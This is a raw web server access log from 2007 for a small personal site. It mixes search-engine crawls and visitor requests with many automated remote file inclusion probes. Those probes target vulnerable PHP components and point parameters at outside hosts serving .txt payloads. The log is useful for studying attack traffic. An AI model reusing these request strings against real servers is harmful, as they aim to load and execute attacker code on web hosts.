205.242.230.204 - - [18/Dec/2007:08:20:20 -0800] "GET /logs/access_071202.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://clat.org/class/can? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
205.242.230.204 - - [18/Dec/2007:08:20:21 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://clat.org/class/can? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
205.242.230.204 - - [18/Dec/2007:08:26:35 -0800] "GET /logs/access_071204.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://clat.org/class/can? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.25.159 - - [18/Dec/2007:08:31:53 -0800] "GET /plans/?M=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.234.219.59 - - [18/Dec/2007:08:36:18 -0800] "GET /logs/access_071202.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [18/Dec/2007:08:36:18 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [18/Dec/2007:08:36:18 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.165.36.191 - - [18/Dec/2007:08:43:00 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.contactosonline.com/backup/percut/logs/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
82.165.36.191 - - [18/Dec/2007:08:43:00 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.contactosonline.com/backup/percut/logs/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
70.85.19.68 - - [18/Dec/2007:09:11:52 -0800] "GET //admin.color.php?mosConfig_live_site=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
70.85.19.68 - - [18/Dec/2007:09:11:52 -0800] "GET /logs//admin.color.php?mosConfig_live_site=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
87.118.120.23 - - [18/Dec/2007:09:33:53 -0800] "GET /presto/ HTTP/1.0" 200 510 "http://tvsetmp3.com" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030704 Epiphany/0.9.2" "www.dmulk.com"
87.118.120.23 - - [18/Dec/2007:09:33:53 -0800] "GET /presto/ HTTP/1.0" 200 510 "http://tvsetmp3.com" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030704 Epiphany/0.9.2" "www.dmulk.com"
87.118.120.23 - - [18/Dec/2007:09:33:54 -0800] "GET /presto/ HTTP/1.0" 200 510 "http://tvsetmp3.com" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030704 Epiphany/0.9.2" "www.dmulk.com"
87.118.120.23 - - [18/Dec/2007:09:33:54 -0800] "GET /presto/ HTTP/1.0" 200 510 "http://tvsetmp3.com" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030704 Epiphany/0.9.2" "www.dmulk.com"
66.103.20.46 - - [18/Dec/2007:09:38:15 -0800] "GET /index.php?spaw_root=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.103.20.46 - - [18/Dec/2007:09:38:16 -0800] "GET /logs/index.php?spaw_root=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
97.97.100.128 - - [18/Dec/2007:09:39:31 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
97.97.100.128 - - [18/Dec/2007:09:39:31 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.xbox.com/en-US/games/m/mystIIIexile/details.page/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
74.6.22.21 - - [18/Dec/2007:09:45:07 -0800] "GET /tmp/sess_3f0397b1a05b0a439aaf4b584f62c3ea HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.103.20.46 - - [18/Dec/2007:09:51:31 -0800] "GET /home.php?spaw_root=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.103.20.46 - - [18/Dec/2007:09:51:31 -0800] "GET /logs/home.php?spaw_root=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.103.20.46 - - [18/Dec/2007:09:55:32 -0800] "GET /logs/menu.php?spaw_root=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.103.20.46 - - [18/Dec/2007:09:55:32 -0800] "GET /menu.php?spaw_root=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
74.6.23.139 - - [18/Dec/2007:09:56:04 -0800] "GET /minamijewelry/kanji1.psd HTTP/1.0" 200 515148 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.156 - - [18/Dec/2007:10:05:16 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.103.20.46 - - [18/Dec/2007:10:09:19 -0800] "GET /contact.php?spaw_root=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.103.20.46 - - [18/Dec/2007:10:09:19 -0800] "GET /logs/contact.php?spaw_root=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
76.212.1.234 - - [18/Dec/2007:10:12:09 -0800] "GET /logs/access_070816.log HTTP/1.1" 200 48263 "http://www.google.com/search?hl=en&q=66.249.73.36&btnG=Google+Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.103.20.46 - - [18/Dec/2007:10:12:18 -0800] "GET /about.php?spaw_root=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.103.20.46 - - [18/Dec/2007:10:12:18 -0800] "GET /logs/about.php?spaw_root=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
88.227.229.250 - - [18/Dec/2007:10:13:21 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.dmulk.com"
88.227.229.250 - - [18/Dec/2007:10:13:22 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.intikam.org/kral.txt? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; Synapse)" "www.dmulk.com"
76.212.1.234 - - [18/Dec/2007:10:13:56 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
76.212.1.234 - - [18/Dec/2007:10:14:04 -0800] "GET /_private/ HTTP/1.1" 403 163 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
76.212.1.234 - - [18/Dec/2007:10:14:07 -0800] "GET /mobilehackers/ HTTP/1.1" 401 395 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.20.210 - - [18/Dec/2007:10:19:25 -0800] "GET /logs/access_070711.log HTTP/1.0" 200 43580 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.219 - - [18/Dec/2007:10:46:56 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.124 - - [18/Dec/2007:10:52:48 -0800] "GET /megumi/Necklace/?S=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.156 - - [18/Dec/2007:10:55:48 -0800] "GET /tmp/?N=A HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.152 - - [18/Dec/2007:11:11:29 -0800] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.209.207 - - [18/Dec/2007:11:13:37 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [18/Dec/2007:11:13:38 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:15:39 -0800] "GET /mobileoffice/cf_3.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:16:06 -0800] "GET /mobileoffice/2c_6.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
85.214.103.139 - - [18/Dec/2007:11:16:18 -0800] "GET /logs/access_071202.log/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.103.139 - - [18/Dec/2007:11:16:18 -0800] "GET /com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.103.139 - - [18/Dec/2007:11:16:19 -0800] "GET /logs/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.103.139 - - [18/Dec/2007:11:16:51 -0800] "GET /logs/access_071204.log/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.103.139 - - [18/Dec/2007:11:18:59 -0800] "GET /com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.103.139 - - [18/Dec/2007:11:19:17 -0800] "GET /logs/access_071109.log/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.103.139 - - [18/Dec/2007:11:19:17 -0800] "GET /com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.103.139 - - [18/Dec/2007:11:19:18 -0800] "GET /logs/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.103.139 - - [18/Dec/2007:11:19:18 -0800] "GET /logs/access_071030.log/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:20:37 -0800] "GET /mobileoffice/99_8.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:20:58 -0800] "GET /mobileoffice/e0_3.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:21:39 -0800] "GET /mobileoffice/2c_3.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:22:04 -0800] "GET /mobileoffice/e0_4.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
85.214.103.139 - - [18/Dec/2007:11:22:38 -0800] "GET /logs/access_071207.log/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.103.139 - - [18/Dec/2007:11:22:49 -0800] "GET /logs/access_071018.log/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:23:18 -0800] "GET /mobileoffice/ef_11.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
65.55.209.204 - - [18/Dec/2007:11:23:20 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.204 - - [18/Dec/2007:11:23:20 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:24:10 -0800] "GET /mobileoffice/94_22.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:24:38 -0800] "GET /mobileoffice/DCP_0125.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:25:08 -0800] "GET /mobileoffice/DCP_0126.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:25:26 -0800] "GET /mobileoffice/DCP_0127.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:25:50 -0800] "GET /mobileoffice/DCP_0128.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:26:09 -0800] "GET /mobileoffice/2c_12_sb.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
71.237.73.145 - - [18/Dec/2007:11:26:27 -0800] "GET /funny/ HTTP/1.1" 200 808 "http://www.google.com/search?q=%22intitle:index.of:%22+funny&hl=en&client=firefox-a&rls=org.mozilla:en-US:official&hs=kgM&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
71.237.73.145 - - [18/Dec/2007:11:26:28 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:26:33 -0800] "GET /mobileoffice/Picture_011.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
210.207.152.2 - - [18/Dec/2007:11:26:55 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
210.207.152.2 - - [18/Dec/2007:11:26:55 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://h1.ripway.com/emotoy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
74.6.23.227 - - [18/Dec/2007:11:27:44 -0800] "GET /tmp/sess_3c66a8f8c5cddcb2b9a17f28c7adc19e HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:27:58 -0800] "GET /mobileoffice/Picture_012.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
216.110.190.91 - - [18/Dec/2007:11:28:31 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.110.190.91 - - [18/Dec/2007:11:28:34 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://curraro.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:28:50 -0800] "GET /mobileoffice/Picture_006.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:29:53 -0800] "GET /mobileoffice/Picture_017.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:30:51 -0800] "GET /mobileoffice/Picture_007.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:31:37 -0800] "GET /mobileoffice/Picture_004.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:32:26 -0800] "GET /mobileoffice/Picture_013.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:32:59 -0800] "GET /mobileoffice/Picture_009.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:33:19 -0800] "GET /mobileoffice/Picture_010.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:33:40 -0800] "GET /mobileoffice/Picture_014.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:34:21 -0800] "GET /mobileoffice/Picture_015.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:34:41 -0800] "GET /mobileoffice/Picture_008.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
61.142.80.108 - - [18/Dec/2007:11:34:41 -0800] "GET /logs/access_071122.log//classes/adodbt/sql.php?classes_dir=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.142.80.108 - - [18/Dec/2007:11:34:42 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.142.80.108 - - [18/Dec/2007:11:34:42 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:35:04 -0800] "GET /mobileoffice/Picture_003.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [18/Dec/2007:11:35:23 -0800] "GET /mobileoffice/Picture_002.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
216.110.190.91 - - [18/Dec/2007:11:43:27 -0800] "GET /logs/access_071122.log//classes/adodbt/sql.php?classes_dir=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.110.190.91 - - [18/Dec/2007:11:43:27 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.190.107 - - [18/Dec/2007:11:44:14 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.110.190.91 - - [18/Dec/2007:11:45:22 -0800] "GET /logs/access_071122.log//classes/adodbt/sql.php?classes_dir=http://curraro.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.110.190.91 - - [18/Dec/2007:11:45:22 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://curraro.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.190.107 - - [18/Dec/2007:11:49:00 -0800] "GET /logs/access_071122.log/classes/adodbt/sql.php?classes_dir=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.190.107 - - [18/Dec/2007:11:49:01 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.190.107 - - [18/Dec/2007:11:49:01 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://www.freewebs.com/bruhul/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
198.74.36.92 - - [18/Dec/2007:11:59:37 -0800] "GET /retreat HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
209.190.23.66 - - [18/Dec/2007:11:59:42 -0800] "GET /logs/index.php?themesdir=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
209.190.23.66 - - [18/Dec/2007:11:59:42 -0800] "GET /index.php?themesdir=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
198.74.36.92 - - [18/Dec/2007:11:59:43 -0800] "GET /retreat1 HTTP/1.1" 301 93 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
198.74.36.92 - - [18/Dec/2007:11:59:43 -0800] "GET /retreat1/ HTTP/1.1" 200 15081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
198.74.36.92 - - [18/Dec/2007:11:59:49 -0800] "GET /retreat1/IMG_2670.JPG HTTP/1.1" 200 2621440 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
198.74.36.92 - - [18/Dec/2007:12:00:00 -0800] "GET /retreat1/IMG_2676.JPG HTTP/1.1" 200 2555904 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
198.74.36.92 - - [18/Dec/2007:12:00:08 -0800] "GET /retreat1/IMG_2681.JPG HTTP/1.1" 200 1970048 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
198.74.36.92 - - [18/Dec/2007:12:00:21 -0800] "GET /retreat1/IMG_2687.JPG HTTP/1.1" 200 3407872 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
198.74.36.92 - - [18/Dec/2007:12:00:29 -0800] "GET /retreat1/IMG_2704.JPG HTTP/1.1" 200 3473408 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
198.74.36.92 - - [18/Dec/2007:12:00:36 -0800] "GET /retreat1/IMG_2723.JPG HTTP/1.1" 200 2752512 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
198.74.36.92 - - [18/Dec/2007:12:00:45 -0800] "GET /retreat1/IMG_2730.JPG HTTP/1.1" 200 2752512 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
